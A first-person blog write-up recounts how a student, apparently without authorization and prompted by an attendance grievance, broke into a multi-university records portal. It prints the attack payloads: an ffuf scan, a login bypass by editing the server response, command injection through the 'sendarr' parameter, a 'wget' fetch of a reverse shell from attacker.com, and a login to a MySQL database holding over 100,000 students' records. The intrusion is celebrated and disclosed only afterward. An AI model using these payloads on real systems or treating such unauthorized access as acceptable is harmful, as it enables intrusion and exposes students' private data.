How I Hacked Into a Nationwide University Database System Exposing Thousands of Student Records

INTRODUCTION

Hello friends, I’m a 3rd year BCA student & part-time Bug hunter who is very passionate about cybersecurity (Mainly web). Here is a quick article on how I was able to hack into the server of a large university solutions portal which has many university clients and thousands of students’ data.

THE DISCOVERY

One day when i asked my teacher about my attendance score from her register book, She refused and said “NO, just check your student portal.”. Without asking anything further I went to my room, opened my lap, logged into the portal. While checking the attendance, something comes up in my mind. “What if i hacked this?”. The refusal of teacher and my attendance score ( I was in shortage) brought out the hacker mindset inside me. My only goal was to hack into this server, nothing less. And I started testing it…

TARGET

This is a website which is used by many universities/colleges across India to manage student records, marksheets, Attendance, Answer booklets and more. The website can only be logged in by the students and teachers as the valid college registration number is required for the registration purposes.

This server also has a mobile application which uses the same backend.

RECON

So as usual, I started the recon process by finding almost every subdomains & sub-subdomains of the target using the tools like Subfinder, Assetfinder, amass, crt.sh, ffuf. I stored the domain of the target inside a file called “scope” and ran these tools on it. But I could not find any interesting subdomains for that domain.

The portal itself is a subdomain like studentportal.example.com. So I jumped onto my next recon stage which is directory scanning. My favorite tool for directory scanning is FFUF. Which is a fast, reliable tool made for scanning purposes. So I ran this command :

ffuf -w /usr/share/wordlists/dirb/big.txt -recursion -u https://studentportal.example.com/ -mc 200,301,302

And left it ran for like a minute.

I found a interesting directory called /bkp.

Leaving the scanner behind I quickly visited the /bkp endpoint and I found a page. It was a login page for the backup portal. and i was like… Found my first step!!!

The login page for database backup page.

So now I started spamming with every possible default credential combination and none worked. Now starting the attack chain…

PARTIAL AUTH BYPASS

You may be wondering what is “partial” in auth bypass here, I will explain after showing you how I did the auth bypass first.

I started BurpSuite interception and posted with random credentials. Now i can see a request being send with the data I entered.

The request and response for login attempt

Real ones can already spot the vulnerability here!!

In the response we can see it sends us “failure”, This means the login validation has a major role in the client side validation. Possibility of a Response manipulation attack.

So I checked the client side code and saw that the server returns the data-to-be-backed-up on return if the login was success, and redirects the user to panel where it displays the database names returned from the login. As I don’t know what backups existed in the server, I tried editing the “failure” to “success”. The request returned 200 and it sends a request directly to /bkp/connect.php (The connect.php is used to login into the MYSQL db in the backend).

AND I SAW I WAS LOGGED INTO THE PANEL!!

But it was partial, meaning, the database names displayed were ‘s’, ‘u’, ‘c’, ‘c’, ‘e’, ‘s’, ‘s’ because it considered each letters as db names.

I was not able to see the names of databases which can be backed up, but i can use the backup feature if I knew the names of the databases.

REMOTE CODE EXECUTION

In the panel, I saw a button called “Backup”. The function of this button was to download the selected backup data into a zip file. On clicking the backup button, It sends a POST request to /bkp/backup1.php where it sends the backup db names in a parameter called “sendarr”.

The request after clicking backup

So i tried fuzzing with the sendarr parameter for like 10–20 minutes and finally i found a big lead.

When I entered the value for sendarr as %00 (Nullbyte) The server crashed with an interesting error response.

The response which shows the backend uses exec()

It was using exec() function in the backend for processing this backup.

The exec() command in PHP is used to run system commands from the PHP file.

If you want to know more about what exec() does, Read it here.

I was very thrilled to see this response as it shows that the server uses exec() for this process. So I immediately injected a payload which does sleep for 20 seconds and sends response.

sendarr=|sleep 20

The | (Pipe) symbol is used in the Bash/Linux terminal to redirect the response of a command to another command, Basically chaining.

So the current command will look this in the backend:

./backup.sh | sleep 20

So after running the backup.sh, It runs the sleep command.

I send the request and BOOM!! It took 20.6 seconds for the server to respond to the request. And now i confirmed it’s a RCE vulnerability.

Currently it’s blind, I need to get visible proof of it before moving further, So i ran a command and redirected the output into /var/www/html/out.

The home directory for the website is /var/www/html, So if i place a file inside the home directory which has the output of the command I run, I can see the output by visiting /out. So I injected this payload:

sendarr=|id>/var/www/html/out

This payload executes the “id” command on the server and redirects the output into the out file.

And then I visited /out. and YEAHH!!!

Now I got a code execution, I made a simple python script to interact with the server like a shell

Basic RCE exploit

Now it’s time to PWN the server..

GAINING ACCESS

Now to get inside the server, I used a reverse shell by PentestMonkey.

I hosted the reverse shell file on my attacker machine and downloaded it into the target server using the following payload:

sendarr=|wget https://attacker.com/rev.php

This command downloaded the reverse shell into the website home directory.

Now I started a listener on netcat and visited /rev.php

AND I GOT THE SHELL!!!!

Reverse shell

Now I successfully got inside the server.

I was very happy and nervous at the same time. I did have the hacker urge to go through the files to find the sensitive information.

I found every program files inside the server exposing the functionalities like Student data management, Markscard generation program, Program to add the student marks into database, Program to insert attendance data, Payment processing and more.

While searching through the files, I got what I want… A file called consts.php which has the credentials for the MySQL which can be used to login to the Database.

MySQL credentials found in consts.php

No more waiting, I quickly tried to login to the MySQL using the following command:

mysql -h servername.rds.amazonaws.com -u username -p

AND BOOM!! I’m in the database!!!

I found many databases of different universities and colleges.

I found my college in the list and i tried to find my attendance, admission, marks data and I was able to find it!

Here are some screenshots of the data I found :

As a responsible ethical hacker, I should not attempt to change/delete/add any data into the database. So I reported this to my college dean who forwarded it to the I.T team of this service provider, It took almost 2 weeks for the vulnerability to be fixed.

The database almost had data of 100,000+ college students across the country.

CONCLUSION

Finally I accomplished my mission to hack into the server. It took me 3 days to perform the full exploit chain and reach the database.

This was my quick writeup, Hope you enjoyed this, Clap for this writeup if you liked it. Stay tuned for more…